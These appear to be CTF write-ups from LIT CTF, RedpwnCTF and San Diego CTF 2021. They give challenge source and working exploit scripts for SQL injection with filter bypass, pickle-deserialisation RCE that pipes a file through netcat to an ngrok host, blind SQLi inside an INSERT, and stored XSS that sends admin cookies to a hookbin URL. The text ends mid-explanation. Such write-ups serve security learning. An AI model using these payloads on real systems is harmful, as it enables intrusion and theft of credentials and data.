Here, you can find write-ups of few interesting challenges from my solves in LIT CTF 2021. You can find and learn the below mentioned techniques:

• SQL injection with WAF bypass
• RCE using python pickle desirialisation, bypassing the input(dictionary) validation
• Abusing the funtionality of a Web-Socket Server

LIT BUGS

Source code

var express = require('express');
var app = express();
var http = require('http').createServer(app);
var io = require('socket.io')(http);
var md5 = require("md5");
var fs = require('fs');

const flag = fs.readFileSync("flag.txt",{encoding:'utf8', flag:'r'});

var accounts = {};
// Special account for LIT Organizers
var admin_id = Math.floor(Math.random() * 1000)
accounts[flag] = {
	"password": md5(flag),
	"rand_id": admin_id
};

id2Name = {};
for(let [name,account] of Object.entries(accounts)) {
	id2Name[account["rand_id"]] = name;
}

io.on('connection',(socket) => {
	socket.on('login',(tn,pwd) => {
		if(accounts[tn] == undefined || accounts[tn]["password"] != md5(pwd)) {
			socket.emit("loginRes",false,-3);
			return;
		}
		socket.emit("loginRes",true,accounts[tn]["rand_id"]);
		return;
	});

	socket.on('reqName',(rand_id) => {
		name = id2Name[parseInt(rand_id)];
		socket.emit("reqNameRes",name);
	});

	socket.on('register',(tn,pwd) => {
		if(accounts[tn] != undefined) {
			socket.emit("regRes",false,-1);
			return;
		}
		if(Object.keys(accounts).length >= 500) {
			socket.emit("regRes",false,-2);
			return;
		}
		var rand_id = Math.floor(Math.random() * 1000);
		while(id2Name[rand_id] != undefined) {
			rand_id = Math.floor(Math.random() * 1000);
		}
		accounts[tn] = {
			"password": md5(pwd),
			"rand_id": rand_id
		};
		id2Name[rand_id] = tn;
		socket.emit("regRes",true,rand_id);
	});
});


app.get('/',(req,res) => {
	res.sendFile(__dirname + '/html/index.html');
});

app.get('/login',(req,res) => {
	res.sendFile(__dirname + '/html/login.html');
});

app.get('/register',(req,res) => {
	res.sendFile(__dirname + '/html/register.html');
});

app.get('/contest',(req,res) => {
	res.sendFile(__dirname + '/html/contest.html');
});

http.listen(8081,() => {
	console.log('listening on *:8081');
});

Vulnerablity

The application runs uses Web-Sockets which has a funtionality of registering users. Each user has a random 3 digit ID asscociated with his name and password The flag was stored as name of the admin. So, the Goal was to get the admin’s name.

Also the application has other funtionality which takes the ID and returns the name.

socket.on('reqName',(rand_id) => {
		name = id2Name[parseInt(rand_id)];
		socket.emit("reqNameRes",name);
	});

So bruteforcing all the ID’s from 100 to 999 could give us the flag (easy-peasy!)

Exploit script

var io = require('socket.io-client');
var socket = io.connect('http://websites.litctf.live:8000', {reconnect: true});

// Add a connect listener
socket.on('connect', function (socket) {
    console.log('Connected!');
});

socket.on("reqNameRes", (name) => {
    if(name != null && name.startsWith("flag{")){
        console.log("Name: "+name);
        socket.close();
    }
})

for(var i=1; i<1000; i++){
    socket.emit("reqName", i);
}

Flag

flag{if_y0u_d1d_not_brut3force_ids_plea5e_c0ntact_codetiger}

Alex Fan Club

Source code

import sqlite3
from flask import Flask, render_template, g, request

app = Flask(__name__)

DATABASE = "db"

def get_db():
    db = getattr(g, "_database", None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
    return db

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, "_database", None)
    if db is not None:
        db.close()

def query_db(query, args=(), one=False):
    cur = get_db().execute(query, args)
    rv = cur.fetchall()
    cur.close()
    return (rv[0] if rv else None) if one else rv

@app.route("/", methods=["GET"])
def index():
    param = request.args.get("param")
    achievements = query_db("select * from achievements")
    if param != None:
        sqli = 1 in [c in param for c in "*-/ |%"]
        if sqli:
            return render_template("sqli.html")
        achievements = query_db("select * from achievements where achievement like '%" + param + "%'")
    achievements = [achievement[0] for achievement in achievements]
    return render_template("index.html", achievements=achievements)

PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE achievements(
achievement TEXT PRIMARY KEY NOT NULL
);
INSERT INTO achievements VALUES('CF Master');
INSERT INTO achievements VALUES('USACO camper');
INSERT INTO achievements VALUES('pro skillz piano player');
INSERT INTO achievements VALUES('Actually bought sublime text :o');
INSERT INTO achievements VALUES('Knows more chinese than you');
INSERT INTO achievements VALUES('Supreme Leader/Cult Leader of LexMACS');
INSERT INTO achievements VALUES('Organized LIT');
INSERT INTO achievements VALUES('OP at web development');
INSERT INTO achievements VALUES('Puts using namespace std; as the FIRST LINE in his code :O');
INSERT INTO achievements VALUES('Too cool for #include <bits/stdc++.h>');
INSERT INTO achievements VALUES('Top tier MS Paint skills');
INSERT INTO achievements VALUES('Has an informative Youtube channel');
INSERT INTO achievements VALUES('Carried OlyFans during mBIT');
INSERT INTO achievements VALUES('Got top 10 for HSCTF 8');
INSERT INTO achievements VALUES('Is super cool');
INSERT INTO achievements VALUES('Knows fishy15 :yum:');
INSERT INTO achievements VALUES('Has discord nitro');
INSERT INTO achievements VALUES('Beat lots of IGMs in CF Round 728');
INSERT INTO achievements VALUES('Went from pupil to master in ONE year');
INSERT INTO achievements VALUES('Practices consistently orz');
INSERT INTO achievements VALUES('Created USACO Rating');
INSERT INTO achievements VALUES('Able to make better website designs than this');
INSERT INTO achievements VALUES('Able to get AC while using Scanner instead of BufferedReader in Java/Kotlin');
INSERT INTO achievements VALUES('Has a cool profile picture');
CREATE TABLE redacted(
redacted TEXT PRIMARY KEY NOT NULL
);
INSERT INTO redacted VALUES('flag{redacted}');
COMMIT;

Vulnerablity

The Website has a search functionality to search among achivements. The search parameter is vulnerable to SQL injection.

achievements = query_db("select * from achievements where achievement like '%" + param + "%'")

But the search parameter is validated using a blacklist to avoid SQLi. If any character in the blacklist is inside the param then param would get rejected. But there are interesting ways to bypass blacklist filters

sqli = 1 in [c in param for c in "*-/ |%"]
	if sqli:
	    return render_template("sqli.html")

The db used is sqlite3. In our case the we need to bypass the space character and comments to get a valid injection. So let me mention few bypasses -

• Space characters can be avoided using paranthesis.

SELECT name from users; --> SELECT(name)FROM(users);

• Space characters can also be bypassed using \n (new line characters).

SELECT name from users;  

-->

SELECT
name
FROM
users;

• Comments (/* */) can be avoided by making the trailing statement after injection, valid

Exploit script

import requests
url = "http://alex-fan-club.litctf.live"

# Use the payload to get the table and column names
payload = '''Has'
union
SELECT
sql
FROM
sqlite_master
WHERE
type!='meta'
AND
sql
NOT
NULL
AND
name='redacted'
or
'has'like\''''

# After you get the table and column names, 
# substitute them here, and use this payload 
# to get the flag
payload2 = '''Has'
union
SELECT
flag_column
from
flag_is_in_here
where
flag_column
like\''''

url = url + "/?param=" + payload2
res = requests.get(url)
print(res.text)

Flag

flag{c0d3tig3r_g0t_gm_p3rf0rm4nc3_on_a_div_1_0rz}

A Flask of Pickles

Source code

import secrets
from flask import Flask, render_template, request
import pickle
import base64

flag = "REDACTED"

app = Flask(__name__)

users = {
    "example-user": {
        "name": "example",
        "bio": "this is example"
    }
}

@app.route("/")
def index():
    return render_template("index.html")

@app.route("/new", methods=["POST"])
def new():

    # print("request_data", request.get_data())
    pickle_str = base64.b64decode(request.get_data())

    # print("pickle_str", pickle_str)
    
    if len(pickle_str) > 138:
        return "length exxeded: "+ str(len(pickle_str))

    dict_prefix = b"\x80\x04\x95" + chr(len(pickle_str)-11).encode() + b"\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04name\x94\x8c"
    dict_suffix = b"\x94u."
    # print("dict_suffix", dict_suffix)
    # print("dict_prefix", dict_prefix)
    
    # make sure dictionary is valid and no funny business is going on
    if pickle_str[:len(dict_prefix)] != dict_prefix or pickle_str[-len(dict_suffix):] != dict_suffix or b"flag" in pickle_str or b"os." in pickle_str or b"open" in pickle_str:
        return "uhoh"

    url = secrets.token_urlsafe(16)
    obj = pickle.loads(pickle_str)
    # print(obj)
    users[url] = obj    

    return "user?id=" + url

@app.route("/uhoh")
def uhoh():
    return render_template("uhoh.html")

@app.route("/user", methods=["GET"])
def user():
    uid = request.args.get("id")
    if len(uid) < 10:
        return "id too short"
    if uid not in users:
        return "user not found :("
    return render_template("user.html", user=users[uid])

Vulnerablity

I have seen many typical pickle challenges in my previous CTFs. Also have seen some insane challenges which could give a Brain Fuck. The goal of the current challenge is to get a Remote Code Execution by exploiting python pickle desirialisation.

Application has a functionality to store a user’s name and Bio. The name and Bio were sent to the application in the form of a serialized dictionary. This dictionary was being desirialised in backend to read the values. As the dict can be controlled by user, we could provide a specially crafted pickle to get RCE.

One way to do that using the __reduce__ method in the pickled class

class RCE():
	def __reduce__(self):
		cmd = 'ls' # modify to any command
		return os.system, (cmd,)

But then comes the caveat. The user provided dict signature was being validated. Also the pickle string was being validated with a blacklist. Along with that, the pickle string’s length is constrained to 138 chars

if len(pickle_str) > 138:
    return "length exxeded: "+ str(len(pickle_str))

dict_prefix = b"\x80\x04\x95" + chr(len(pickle_str)-11).encode() + b"\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04name\x94\x8c"
dict_suffix = b"\x94u."

# make sure dictionary is valid and no funny business is going on
if pickle_str[:len(dict_prefix)] != dict_prefix or pickle_str[-len(dict_suffix):] != dict_suffix or b"flag" in pickle_str or b"os." in pickle_str or b"open" in pickle_str:
    return "uhoh"

So due to this limitation, we cannot directly pickle the RCE class. We can only send a pickled dictionary. Also couldn’t use the os. in the pickle.

Bypassing the above limitations was not that complicated.

First, to bypass the dictionary check, we can assign the object of RCE class, as a value in the dictionary. Doing this way would make our input a valid dict, meanwhile holding the Exploit pickle.

class R():                             # used R as class name to reduce payload size
	def __reduce__(self):
		cmd = 'ls'
		return os.system, (command,)

obj = {'name': R(), 'bio': ''}
pic = pickle.dumps(obj)
enc = base64.b64encode(pic)

We need not to bypass os.. Because the pickle contains os and system as separate strings so the exploit works perfectly. I guess it was the author’s mistake. He should have used os instead of os. in blacklist.

So, finally i pulled up a ngrok server to listen for reverse connections in my local port. As the flag is stored in flaskofpickles.py, I used netcat to make a reverse connection to deliver the file to my pc.

Exploit script

import pickle, os, pickletools, requests, base64

url = "https://a-flask-of-pickles.litctf.live"
# url = "http://0.0.0.0:1337"

rshell = '''cat flaskofpickles.py | nc 2.tcp.ngrok.io 10656''' # replace ngrok domain


class R():
	def __reduce__(self):
		cmd = 'ls'
		return os.system, (rshell,)

obj = {'name': R(), 'bio': ''}	

pic = pickle.dumps(obj)
enc = base64.b64encode(pic)

pickletools.dis(pic)

res = requests.post(url+'/new', data=enc)

print(res.text)

Flag

flag{my_p1ckl35_p0k3d_a_h0l3_in_my_fl4sk}

Takeaways

• Never deserialize user input directly. It you can’t avoid, try implementing hardened security checks (which is impossible, lol)
• Whitelists are better then blacklists.
• Use parameterized queried to avoid SQL injections.
• Keep an eye on abusive funtionality in the application.

Happy Hacking!

Feel free to provide feedback.

Here, you can find write-ups of few interesting challenges from my solves in RedpwnCTF 2021.

Cool

TL;DR

• The application allows users to register.
• The register funtionality is vulnerable to SQL injection.
• In this case, SQLi is inside the INSERT statement.
• Retriving data is non-trivial and time consuming using this type of SQLi.
• The goal is to retrive the admin’s password.
• And we get the flag

Looking into website we have a registration page -

On registering with an arbitary account and logging in would display the following message

The source code for the website is given. Take a look at it -

from flask import (
    Flask,
    request,
    render_template_string,
    session,
    redirect,
    send_file
)
from random import SystemRandom
import sqlite3
import os

app = Flask(__name__)
app.secret_key = 'IS_THIS_VULN'

rand = SystemRandom()

allowed_characters = set(
    'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789'
)

def execute(query):
    con = sqlite3.connect('db/db.sqlite3')
    cur = con.cursor()
    cur.execute(query)
    con.commit()
    return cur.fetchall()


def generate_token():
    
    tok = ''.join(
        rand.choice(list(allowed_characters)) for _ in range(32)
    )
    print(tok)
    return tok


def create_user(username, password):
    print(username)
    if any(c not in allowed_characters for c in username):
        return (False, 'Alphanumeric usernames only, please.')
    if len(username) < 1:
        return (False, 'Username is too short.')
    if len(password) > 50:
        return (False, 'Password is too long.')
    other_users = execute(
        f'SELECT * FROM users WHERE username=\'{username}\';'
    )
    if len(other_users) > 0:
        return (False, 'Username taken.')
    execute(
        'INSERT INTO users (username, password)'
        f'VALUES (\'{username}\', \'{password}\');'
    )
    return (True, '')


def check_login(username, password):

    if any(c not in allowed_characters for c in username):
        return False
    correct_password = execute(
        f'SELECT password FROM users WHERE username=\'{username}\';'
    )
    if len(correct_password) < 1:
        return False
    print(correct_password)
    return correct_password[0][0] == password


@app.route('/', methods=['GET', 'POST'])
def login():
    error = ''
    if request.method == 'POST':
        valid_login = check_login(
            request.form['username'],
            request.form['password']
        )
        if valid_login:
            session['username'] = request.form['username']
            return redirect('/message')
        error = 'Incorrect username or password.'
    if 'username' in session:
        return redirect('/message')
    return render_template_string('''
        <link rel="stylesheet" href="/static/style.css" />
        <div class="container">
            <p>Log in to see Aaron's message!</p>
            <form method="POST">
                <label for="username">Username</label>
                <input type="text" name="username" />
                <label for="password">Password</label>
                <input type="password" name="password" />
                <input type="submit" value="Log In" />
            </form>
            <p></p>
            <a href="/register">Register</a>
        <div class="container">
    ''', error=error)


@app.route('/register', methods=['GET', 'POST'])
def register():
    message = ''
    if request.method == 'POST':
        success, message = create_user(
            request.form['username'],
            request.form['password']
        )
        if success:
            session['username'] = request.form['username']
            return redirect('/message')
    return render_template_string('''
        <link rel="stylesheet" href="/static/style.css" />
        <div class="container">
            <p>Register!</p>
            <form method="POST">
                <label for="username">Username</label>
                <input type="text" name="username" />
                <label for="password">Password</label>
                <input type="password" name="password" />
                <input type="submit" value="Register" />
            </form>
            <p></p>
        </div>
    ''', error=message)


@app.route('/message')
def message():
    if 'username' not in session:
        return redirect('/')
    if session['username'] == 'ginkoid':
        return send_file(
            'flag.mp3',
            attachment_filename='flag-at-end-of-file.mp3'
        )
    return '''
        <link rel="stylesheet" href="/static/style.css" />
            <div class="container">
            <p>You are logged in!</p>
            <p>Unfortunately, Aaron's message is for cool people only.</p>
            <p>(like ginkoid)</p>
            <a href="/logout">Log out</a>
        </div>
    '''


@app.route('/logout')
def logout():
    if 'username' not in session:
        return redirect('/')
    del session['username']
    return redirect('/')


def init():
    # this is terrible but who cares
    execute('''
        CREATE TABLE IF NOT EXISTS users (
            username TEXT PRIMARY KEY,
            password TEXT
        );
    ''')
    execute('DROP TABLE users;')
    execute('''
        CREATE TABLE users (
            username TEXT PRIMARY KEY,
            password TEXT
        );
    ''')

    # put ginkoid into db
    ginkoid_password = generate_token()
    execute(
        'INSERT OR IGNORE INTO users (username, password)'
        f'VALUES (\'ginkoid\', \'{ginkoid_password}\');'
    )
    execute(
        f'UPDATE users SET password=\'{ginkoid_password}\''
        f'WHERE username=\'ginkoid\';'
    )

    app.run(debug=True)

init()

Looking at the source code above carefully, we can find that [INSERT INTO] statement in create_user. The username is whitelisted for allowed characters but not the password field. Additionally password must be less than 50 chars long.

To retrive the data using this injection is not so easy because -

• The execute funtion cannot execute multiple statements.
• And INSERT statement cannot be combined with other statements easily, to retrive data.

Work around

So to exploit this situation, we must use something with INSERT statement.

Let’s first take a look at injection -

INSERT INTO users (username, password) values ('username', '[INJECTION POINT]');

We just need to break out of SQL syntax by injecting foo’)– in password field -

INSERT INTO users (username, password) values ('foo', 'foo')--');

With this we can confirm the SQLi, checking if user with those creds created.

So now we need to retrive the password of ginkoid to login and get the flag.

Solution

The strategy to get the password -

• SELECT statement can be used with INSERT statement
• So we can select the fisrt character of ginkoids’s password
• Use that single char as password for new account.
• As the ginkoid’s password lies in allowed characters, we can bruteforce the character by logging into the new account.
• Once logged in, the character is noted as first char of ginkoid’s password
• We repeat the same process 32 times to get each char of password at one time

The basic injection to get first character of ginkoid’s password and stores as new account’s password -

INSERT INTO users (username, password) values ('new1', ''||(substr((select password from users),1,1)))--');

Consider the above payload -

• SELECT password [FROM] users would give the first user’s password. This is used to reduce the payload size.
• Here, substr is used to select a single char of password.
• || operator is used to concatenate the character with an empty string
• -- is used to comment out the rest of the statement to get valid syntax

To automate this, i have used the following python script -

import requests

url = "https://cool.mc.ax"
allowed_characters = set(
    'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789'
) 
name = "loo"


def exploit():
  password = ""
  for i in range(1, 33):

    payload = {
      "username": "{}{}".format(name, i),
      "password": "'||(substr((select password from users),{},1)))--".format(i)
    }

    if i in [10, 20, 30]:
      pos = int(str(i)[0])
      payload = {
        "username": "{}{}".format("foomids", pos),
        "password": "'||(substr((select password from users),{},1)))--".format(i)
      }

    res = requests.post(url+'/register', data=payload)
    # print("[+] Registered a user. Payload: ", payload)

    for c in allowed_characters:
      payload = {
        "username": "{}{}".format(name,i),
        "password": "{}".format(c)
      }

      if i in [10, 20, 30]:
        pos = int(str(i)[0])
        payload = {
          "username": "{}{}".format("foomids",pos),
          "password": "{}".format(c)
        }

      # print(payload)
      res = requests.post(url, data=payload)
    
      if len(res.text) < 600:
        password += c
        print(password) 
        break

    else:
      print("Not found at position: {}".format(i))
      password += '_'
      print(password)


exploit()

Run the above script to get the password. Password randomly changes after every restart. Here is the output password generated by the exploit code -

Login to ginkoid account and you will get an mp3 file with flag.

flag-at-end-of-file.mp3

Run the following command to get the flag -

tail -1 flag-at-end-of-file.mp3

Flag

flag{44r0n_s4ys_s08r137y_1s_c00l}

Notes

TL;DR

• The application has a funtionality to store notes
• Each note has two sections, a body and a tag
• The body is the text section of note and tag can be public or private
• The challange invovled exploiting a stored XSS vulnerability in the tag parameter
• But the payload is constrained to 10 charachters
• As we could store many notes, crafting a valid XSS payload using more than one note worked.
• Application has an admin who has permission of viewing all notes.
• Admin has also stored the FLAG as his private note.
• So send a crafted link to admin which triggers the stored XSS and gets his cookie
• We login as admin and get the flag.

Solution

Lets take a look at the website.

The application allows users to have an account. User can register and login.

The website has a funtionality to take notes. Each note is associated with a body which is the actual content and a tag which can be public or private. Public notes can be viewed by all the users, while private notes can only be viewed by the user who creates it.

Notes are stored and can be viewed later on.

Where is the vulnerablity ?

Source code for the website is given. Interesting parts of the source code are shown below.

const template = document.querySelector('#note-template').innerHTML;
const container = document.querySelector('.container');
const user = new URL(window.location).pathname.split('/')[2];

const populateTemplate = (template, params) =>
  template.replace(/\{\{\s?(.+?)\s?\}\}/g, (match, param) => params[param]);

(async () => {
  const request = await fetch(`/api/notes/${user}`);
  const notes = await request.json();

  const renderedNotes = [];
  for (const note of notes) {
    // this one is controlled by user, so prevent xss
    const body = note.body
      .replaceAll('<', '&lt;')
      .replaceAll('>', '&gt;')
      .replaceAll('"', '&quot;')
      .replaceAll('\'', '&#39;');
    // this one isn't, but make sure it fits on page
    const tag = note.tag.length > 10 ? note.tag.substring(0, 7) + '...' : note.tag;
    // render templates and put them in our array
    const rendered = populateTemplate(template, { body, tag });
    renderedNotes.push(rendered);
  }

  container.innerHTML += renderedNotes.join('');
})();

The above code takes the user-controlled parameters and adds them to HTML template. The special characters which can lead to XSS are encoded in the body parameter. So XSS is not possible in this context.

But wait, is the tag parameter filtered? Oh, it’s not!!

On looking into the website one might think that the tag can only be public or private, but it can simply be modified to anything using a HTTP proxy like Burp. So, we have a user-controlled parameter which is not filtered and added to HTML. This is enough to get stored XSS (As the notes were being stored in the application).

But this is not the big part of the challenge.

The tag paramenter can only be 10 characters long. It would be stripped if it’s more than that. And this is a serious issue.

How to trigger XSS?

I slowly started thinking about bypassing the length check to trigger XSS.

The tag parameter was sent as a string. So modifying it to an array would make it’s length equal to lenght of the array. Irrespective of length of string in the array, length of array would remain 1, thus bypassing the check.

But this didn’t work as the parameter was strictly checked for string type. Tried modifying the content-type
from application/json to application/x-www-form-urlencoded hoping for bypass. But again it strictly checks for json.

Here is the schema used for validation in the source code -

fastify.post(
'/notes',
{
  schema: {
    body: {
      type: 'object',
      properties: {
        body: { type: 'string' },
        tag: { type: 'string' },
      },
      required: ['body', 'tag'],
    },
  },
},
(req) => {
  if (!req.auth.login) throw error('Not logged in!', 401);
  if (req.auth.username === 'admin')
    throw error('No admin notes please!', 400);
  db.addNote(req.auth.username, {
    body: req.body.body,
    tag: req.body.tag,
  });
  return {};
}
);

Wait.. May be we can split a XSS payload and store each part in a tag of separate notes. Ofcourse we should make sure that all the parts form a valid XSS payload.

Lets try sending the following payload

<script>alert(1)</script>

We must also make sure to comment the extra HTML added by the template. As only 10 characters are allowed in a tag, the payload can be sent in following way -

Request 1:

data = {
    "body": "foo",
    "tag": "<script>/*"
}

Request 2:

data = {
    "body": "*/alert(1)/*",
    "tag": "*/"
}

Yayy!! We got a perfect script tag with an alert in it.

The extra HTML added by the template is ignored using javascript comments. But wait, alert hasn’t popped up?? Why is that so? I still don’t understand why it’s not working. If any one did please let me know :)

Solution

But as a work around i tried to inject an image tag. Payload would be similar to -

<img src=1 onerror=alert(1)>

This is not an easy task. Because between every two notes HTML is being added by the template. And we should somehow make our payload to ignore that HTML and trigger the XSS.

In the previous payload we used javascript comments. But as the current context is inside an image tag. So we can’t use comments here.

One way around is making the unwanted HTML as the value of an attribure. After several tries, below payload i used looked a bit promising -

<img x='Unwanted HTML here goes here' src=1 onerror='alert(1)/*Unwanted HTML here goes here*/'>

The x is a fake attribute. Here, it is used to make the payload ignore unwanted HTML.

The above payload can be sent in the following way -

Request 1:

data = {
    "body": "foo",
    "tag": "<img x='"
}

Request 2:

data = {
    "body": "' src=1 onerror='alert(1)/*",
    "tag": "*/'>"
}

But unfortunately, still there was not alert popup.. :( I have took a look into response i got-

I have made a mistake in the payload. I was not able to notice that during the CTF. By that time, three hours left for CTF to end, i felt overwhelemed and finally gave up on it. :(

Looking for solution, I found this in the discord.

By @Triacontakai

I felt bad for not trying enough. My payload was close.

In my payload, the sigle quotes inserted are being parsed in the context of the attribute x. So all the payload inserted is being added as the value of x instead of breaking out.

In the correct solution the one additional tag is used. It first breaks the a attribute and opens onload attribute. Doing this way, it worked. But why is this happening?? It’s all about understanding weird HTML parsing. To modify my payload in a similar way have complications coz of onerror is long attribute. So ignoring the unwanted HTML is hard.

So im gonna stick with above style payload. It uses onload to execute the javascript. It fits exactly. Also to execute arbitrary JS code, it uses eval along with atob, to decode a base64 string and run the code we provide. This is usefull bypassing the encoding of body parameter.

So lets try this now. I have used a python script to do this.

import requests
import base64

url = "https://notes.mc.ax"
hookurl = "https://hookb.in/zrr8VBZpwXhol3MMlLbJ" # replace with your hookbin url
code = "fetch('{}?key='+document.cookie)".format(hookurl)
encoded = base64.b64encode(code.encode()).decode()

username = "lol" # replace with random username

with requests.Session() as s:
  s.headers.update({'Content-Type': 'application/json'})
  data = {
    "username": username,
    "password": username
  }
  res = s.post(url+'/api/register', json=data)
  print("[+] Registered a user..")

  data = {
    "body": "foo",
    "tag": "<style a='"
  }

  res = s.post(url+'/api/notes', json=data)

  data = {
    "body": "foo",
    "tag": "'onload='`"
  }

  res = s.post(url+'/api/notes', json=data)

  data = {
    "body": "`;eval(atob(`{}`))/*".format(encoded),
    "tag": "*/'>"
  }

  res = s.post(url+'/api/notes', json=data)

print("Visit {}/view/{} to trigger stored XSS".format(url, username))
print("Payload generated. Visit {} for cookie".format(hookurl))

To trigger the XSS, view the user’s posts.

Okay XSS part is done. Now we need to leverage this to get admin’s cookie.

Admin’s Cookie

I have to mention one more important point here. Admin can view all the notes of any user regardless of public or private. If this functionality is absent, the stored XSS, we found would have been a self XSS. This is because, we are modifing the tag itself to trigger the XSS.

The source code responsible for this is mentioned below -

fastify.get('/notes/:username', (req) => {
  const notes = db.getNotes(req.params.username);
  if (req.params.username === req.auth.username) return notes;
  if (req.auth.username === 'admin') return notes; // if admin return all the notes
  return notes.filter((note) => note.tag === 'public');
});

So we could make the admin bot to view our notes by providing the link to trigger the XSS. Thus, the XSS would deliver us the admin’s cookie once the admin bot visits the link.

Here is the cookie i got in my hookbin -

Now just use the cookie to be the admin. Look at private posts of admin.

And yeah, we have the flag

Flag

flag{w0w_4n07h3r_60lf1n6_ch4ll3n63}

Takeaways

• Look at all the parameters to check if they are injecteble.
• Try exploiting the vulnerablity in different ways to get more impact.
• Try testing every input parameter for XSS.
• The way HTML parsing is done results in lot of bypasses. Keep an eye.
• Take time to try different payloads. Gradually that will unlock the things.

Happy Hacking!

Feel free to provide feedback.

Here, you can find write-ups of few interesting challenges from my solves in San Diego CTF 2021 2021.

Apollo

TL;DR

• The website’s interface seems to be down.
• While investigating the network, website uses an API with the path /api/status?verbose=
• Setting parameter verbose to any value, unlocks other API paths
• Investigating the responses and crafting a right request would launch the rocket
• Finally, the crafted request, requires an Authorization token, which can be found on Frontend JS pages
• Sending the correct request along with Authorization token would give the flag

Solution

Opening up the website, the page shows two messages about Frontend and Backend Servers. It says, the FrontEnd is not active, but the Backend server is working fine.

There must be some sort of API which the website must be using as refered in the challenge description

Checking out the network tab in firefox dev tools, reveals the Backend API route

https://space.sdc.tf/api/status?verbose=

This route gives the following response

Wait!! We got the API, but what’s the verbose parameter in the URL? May be it generates verbose response!. Trying ?verbose=1, yeilds the following response

Cool!! It revealed some other API paths. Rocket launching and fuel? The path /rocketLaunch is more interesting according to the challenge description

Let’s try sending some requests using python.

Sending a get request using python -

import requests
url = "https://space.sdc.tf/api/rocketLaunch"
print(requests.get(url).text)

request body must be json

Oh, it accepts JSON data. Let’s try a post request with empty data

import requests
data = {}
url = "https://space.sdc.tf/api/rocketLaunch"
res = requests.post(url, json=data)
print(res.text)

rocket not specified

rocket?? May be its a key in the json data. Let’s provide a random rocket.

import requests
data = {"rocket": "random"}
url = "https://space.sdc.tf/api/rocketLaunch"
res = requests.post(url, json=data)
print(res.text)

rocket not recognized (available: triton)

Oh, it accepts triton as a rocket.

import requests
data = {"rocket": "triton"}
url = "https://space.sdc.tf/api/rocketLaunch"
res = requests.post(url, json=data)
print(res.text)

launchTime not specified

And providing a random launch time -

import requests
data = {"rocket": "triton", "launchTime": "random"}
url = "https://space.sdc.tf/api/rocketLaunch"
res = requests.post(url, json=data)
print(res.text)

launchTime not in hh:mm format

Okay !

import requests
data = {"rocket": "triton", "launchTime": "00:01"}
url = "https://space.sdc.tf/api/rocketLaunch"
res = requests.post(url, json=data)
print(res.text)

launchTime unapproved

Cool, we got a break to think here. What would be the launch time? I tried looking in the other API paths. Tried 13:37 from challenge name, but nothing really worked. But then i decided to Brute force

There are 24 hours and 60 minutes. So we get the min time to be 00:00 while the maximum time of 23:59. So the possiblities are few being 24x60=1440

So i used a small python script!

import requests
url = "https://space.sdc.tf/api/rocketLaunch"

for i in range(11, 24):
    for j in range(60):
        time = str(i).zfill(2) + ':' + str(j).zfill(2)
        data = {"rocket": "triton", "launchTime": time}
        res = requests.post(url, json=data)
        
        if len(res.text) > 21:
            print("Got the correct time: " + time)
            exit()
        
        print(time + " : " + res.text)

Cool! We have the correct time now.

Oh my bad! The description tells that the rocket was scheduled at noon today. So we can perfectly use the time 12:00, instead of brute forcing. Anyway…

So going further -

import requests
data = {"rocket": "triton", "launchTime": "12:00"}
url = "https://space.sdc.tf/api/rocketLaunch"
res = requests.post(url, json=data)
print(res.text)

fuel pumpID not specified

Remember the fuel path /api/fuel?

We got some fuels to try out!! I tried all the five fuels. Fourth one is working.

import requests
data = {"rocket": "triton", "launchTime": "12:00", "pumpID": 4}
url = "https://space.sdc.tf/api/rocketLaunch"
res = requests.post(url, json=data)
print(res.text)

frontend authorization token not specified

Oh shit! Authorization? Where do I get the token? But it’s saying frontend authorization. May be, trying out to seach some JS files is a great idea.

As i thought, I found a token in JS a file.

 window.localStorage.getItem("debug") && (e.headers = {
                        Token: "yiLYDykacWp9sgPMluQeKkANeRFXyU3ZuxBrj2BQ"
                    }), fetch("./api/status?verbose=", e).then((function(e) {
                        return e.json()
                    })).then((function(e) {
                        return n(e.longStatus)
                    }))

For some reason, the token was case-sensitive. But is was spelled Token in JS

So finally, providing the token in the json -

import requests
data = {"rocket": "triton", "launchTime": "12:00", "pumpID": 4, "token": "yiLYDykacWp9sgPMluQeKkANeRFXyU3ZuxBrj2BQ"}
url = "https://space.sdc.tf/api/rocketLaunch"
res = requests.post(url, json=data)
print(res.text)

rocket launched. sdctf{0ne_sM@lL_sT3p_f0R_h@ck3r$}

Yayy!! The rocket got launched. We have the flag.

Flag

sdctf{0ne_sM@lL_sT3p_f0R_h@ck3r$}

GETS Request

Disclaimer

I did not solve the challenge in time. I found the solution on discord, later. This write-up helps you understand the detailed solution.

TL;DR

• The website is intented to calculate the no. of primes under the given number. It takes the user provided number as a get-parameter - n
• Length of the get parameter is checked using length attribute in js
• This length check can be bypassed using passing n as an array like n[]. Now, how big the input is, array length, that is no. of elements in an array is going to stay 1.
• And the input is passed as an argument to a binary. But there was no buffer length check inside the binary.
• So this is a classic case of Buffer Overflow!.
• Here, just generating a segmentation-fault would give us the flag.

Source code

const spawn = require('child_process').spawn;

const express = require('express');
const PORT = process.env.PORT || 1337;
const app = express();

const BUFFER_SIZE = 8;

app.get('/prime', (req, res) => {
  if(!req.query.n) {
    res.status(400).send('Missing required parameter n');
    return;
  }
   
  // Here to check the length of `n`, length attribute is used
  if(req.query.n.length > BUFFER_SIZE) {
    res.status(400).send('Requested n too large!');
    return;
  }

  let output = '';
  const proc = spawn(__dirname + '/primegen');
  proc.stdout.on('data', data => output += data.toString());
  proc.on('exit', () => res.send(output));

  // call our super-efficient native prime generator!
  // Here, the user input is passed as argument to primegen binary
  proc.stdin.write(`${req.query.n}\n`);
})

app.use('/', (req, res) => {
  res.sendFile(__dirname + '/index.html');
});

app.use('*', (req, res) => {
  res.status(404).send('Not Found');
});

app.listen(PORT, () => {
  console.log(`prime generator listening at http://localhost:${PORT}`)
})

Solution

Littile quirk in javascript

Take a look at following javascript code Array is concatenated with a string -

It’s like js tries to convert the elemnts in array into strings and performs the concatenation. If multiple arguments are specifies, it adds a , (comma) between the elements. So it a single element is provided the 'hello' and ['hello'] are treated same in certain scenario. So let’s make use of this later.

Length check bypass

In line 45 in above source code, there length check of n using length attribute. This attribute can also be used with the array to give number of elements in the array. Look the code below -

Notice the difference!!

